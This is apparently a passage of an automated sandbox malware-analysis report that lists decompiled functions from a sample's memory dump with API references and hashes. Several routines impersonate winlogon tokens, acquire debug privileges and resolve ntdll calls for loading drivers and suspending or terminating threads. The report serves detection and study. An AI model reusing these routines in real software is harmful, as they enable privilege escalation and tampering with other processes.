                                                                                                        • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                                          • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                          • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                                        • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                                        • API String ID: 3867304300-2177360481
                                                                                                        • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                        • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                                        • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                        • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}





                                                                                                        0x0040955f
                                                                                                        0x00409566
                                                                                                        0x0040956e
                                                                                                        0x00409576
                                                                                                        0x00409586
                                                                                                        0x00409586
                                                                                                        0x0040956e
                                                                                                        0x00409592
                                                                                                        0x004095aa
                                                                                                        0x00409594
                                                                                                        0x004095a3
                                                                                                        0x004095a6
                                                                                                        0x004095a6

                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                                        • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProcProcessTimes
                                                                                                        • String ID: GetProcessTimes$kernel32.dll
                                                                                                        • API String ID: 1714573020-3385500049
                                                                                                        • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                        • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                                        • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                        • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402F31, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 84%
                                                                                                        			E00402F31(void* _a4) {
				void _v530;
				long _v532;
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t22;
				void* _t29;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_t15 = wcsrchr( &_v532, 0x2e);
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000;
				}
				wcscat( &_v532, L".cfg");
				_t18 =  *0x40fa74; // 0x4101c8
				_t19 = _t18 + 0x5504;
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19);
					_pop(_t29);
				}
				_t22 = E00402FC6(_t29, _t36,  &_v532); // executed
				return _t22;
			}











                                                                                                        0x00402f3a
                                                                                                        0x00402f51
                                                                                                        0x00402f60
                                                                                                        0x00402f6f
                                                                                                        0x00402f78
                                                                                                        0x00402f7a
                                                                                                        0x00402f7a
                                                                                                        0x00402f8a
                                                                                                        0x00402f8f
                                                                                                        0x00402f94
                                                                                                        0x00402f99
                                                                                                        0x00402f9e
                                                                                                        0x00402f9f
                                                                                                        0x00402fad
                                                                                                        0x00402fb2
                                                                                                        0x00402fb2
                                                                                                        0x00402fbd
                                                                                                        0x00402fc5

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00402F51
                                                                                                          • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                        • wcsrchr.MSVCRT ref: 00402F6F
                                                                                                        • wcscat.MSVCRT ref: 00402F8A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                        • String ID: .cfg
                                                                                                        • API String ID: 776488737-3410578098
                                                                                                        • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                        • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                                                        • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                        • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00409DDC, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 35%
                                                                                                        			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040B550(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20); // executed
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E004051B8( &_v16392, _t34, _a16);
				} else {
					memset();
					E0040512F(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}










                                                                                                        0x00409ddc
                                                                                                        0x00409de4
                                                                                                        0x00409df0
                                                                                                        0x00409df5
                                                                                                        0x00409df6
                                                                                                        0x00409e03
                                                                                                        0x00409e05
                                                                                                        0x00409e06
                                                                                                        0x00409e3b
                                                                                                        0x00409e5d
                                                                                                        0x00409e6a
                                                                                                        0x00409e73
                                                                                                        0x00409e75
                                                                                                        0x00409e08
                                                                                                        0x00409e08
                                                                                                        0x00409e19
                                                                                                        0x00409e37
                                                                                                        0x00409e37
                                                                                                        0x00409e81

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00409E08
                                                                                                          • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                                                          • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                                                        • memset.MSVCRT ref: 00409E3B
                                                                                                        • GetPrivateProfileStringW.KERNEL32 ref: 00409E5D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 1127616056-0
                                                                                                        • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                        • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                                                        • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                        • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                                                        0x00404951
                                                                                                        0x00404952
                                                                                                        0x00404956
                                                                                                        0x004049a1
                                                                                                        0x00404958
                                                                                                        0x00404959
                                                                                                        0x0040495b
                                                                                                        0x0040495b
                                                                                                        0x0040495f
                                                                                                        0x00404961
                                                                                                        0x00404963
                                                                                                        0x0040496d
                                                                                                        0x00404975
                                                                                                        0x00404977
                                                                                                        0x0040497b
                                                                                                        0x00404985
                                                                                                        0x0040498a
                                                                                                        0x0040498e
                                                                                                        0x00404993
                                                                                                        0x0040499d
                                                                                                        0x0040499d

                                                                                                        APIs
                                                                                                        • malloc.MSVCRT ref: 0040496D
                                                                                                        • memcpy.MSVCRT ref: 00404985
                                                                                                        • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: freemallocmemcpy
                                                                                                        • String ID: W@
                                                                                                        • API String ID: 3056473165-1729568415
                                                                                                        • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                        • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                                        • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                        • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}








                                                                                                        0x0040543f
                                                                                                        0x00405456
                                                                                                        0x00405462
                                                                                                        0x00405467
                                                                                                        0x0040546d
                                                                                                        0x00405478
                                                                                                        0x00405489
                                                                                                        0x0040548d
                                                                                                        0x00000000
                                                                                                        0x00405492
                                                                                                        0x00405496

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00405456
                                                                                                          • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                          • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                          • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                                          • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                                        • wcscat.MSVCRT ref: 00405478
                                                                                                        • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3725422290-0
                                                                                                        • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                        • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                                                        • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                        • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00409E82, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetPrivateProfileIntW.KERNEL32 ref: 00409EA9
                                                                                                          • Part of subcall function 00409D12: memset.MSVCRT ref: 00409D31
                                                                                                          • Part of subcall function 00409D12: _itow.MSVCRT ref: 00409D48
                                                                                                          • Part of subcall function 00409D12: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00409D57
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 4232544981-0
                                                                                                        • Opcode ID: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                                        • Instruction ID: 9cbd54488ddde29c65bb9f464d3594e5c231a9cc3fc51dd6b87f783e4d357368
                                                                                                        • Opcode Fuzzy Hash: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                                        • Instruction Fuzzy Hash: CDE0B632000209FFDF125F80EC01AAA3B66FF14315F648569F95814171D33799B0EF88
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}






                                                                                                        0x00408f4c
                                                                                                        0x00408f57
                                                                                                        0x00408f60
                                                                                                        0x00408f62
                                                                                                        0x00408f67
                                                                                                        0x00408f67
                                                                                                        0x00408f71

                                                                                                        APIs
                                                                                                          • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                          • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 187924719-0
                                                                                                        • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                        • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                                                        • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                        • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 37%
                                                                                                        			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}







                                                                                                        0x004098fa
                                                                                                        0x004098fc
                                                                                                        0x00409901
                                                                                                        0x00409907
                                                                                                        0x00000000
                                                                                                        0x0040991c
                                                                                                        0x00409918
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                          • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                          • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                          • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                          • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                          • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                        • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$FileModuleName
                                                                                                        • String ID:
                                                                                                        • API String ID: 3859505661-0
                                                                                                        • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                        • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                                                        • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                        • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}






                                                                                                        0x004095da
                                                                                                        0x004095da
                                                                                                        0x004095de
                                                                                                        0x004095e1
                                                                                                        0x004095e7
                                                                                                        0x004095e7
                                                                                                        0x004095ee
                                                                                                        0x004095fc

                                                                                                        APIs
                                                                                                        • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary
                                                                                                        • String ID:
                                                                                                        • API String ID: 3664257935-0
                                                                                                        • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                        • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                                                        • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                        • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}



                                                                                                        0x0040a3d0
                                                                                                        0x0040a3d9

                                                                                                        APIs
                                                                                                        • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: EnumNamesResource
                                                                                                        • String ID:
                                                                                                        • API String ID: 3334572018-0
                                                                                                        • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                        • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                                                        • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                        • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}






                                                                                                        0x00408e38
                                                                                                        0x00408e44
                                                                                                        0x00408e56
                                                                                                        0x00408e68
                                                                                                        0x00408e7a
                                                                                                        0x00408e8c
                                                                                                        0x00408e9e
                                                                                                        0x00408eb0
                                                                                                        0x00408ec2
                                                                                                        0x00408ed4
                                                                                                        0x00408ee6
                                                                                                        0x00408ef8
                                                                                                        0x00408f0a
                                                                                                        0x00408f1c
                                                                                                        0x00408f21
                                                                                                        0x00408f23
                                                                                                        0x00000000
                                                                                                        0x00408f28
                                                                                                        0x00408f29

                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                        • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
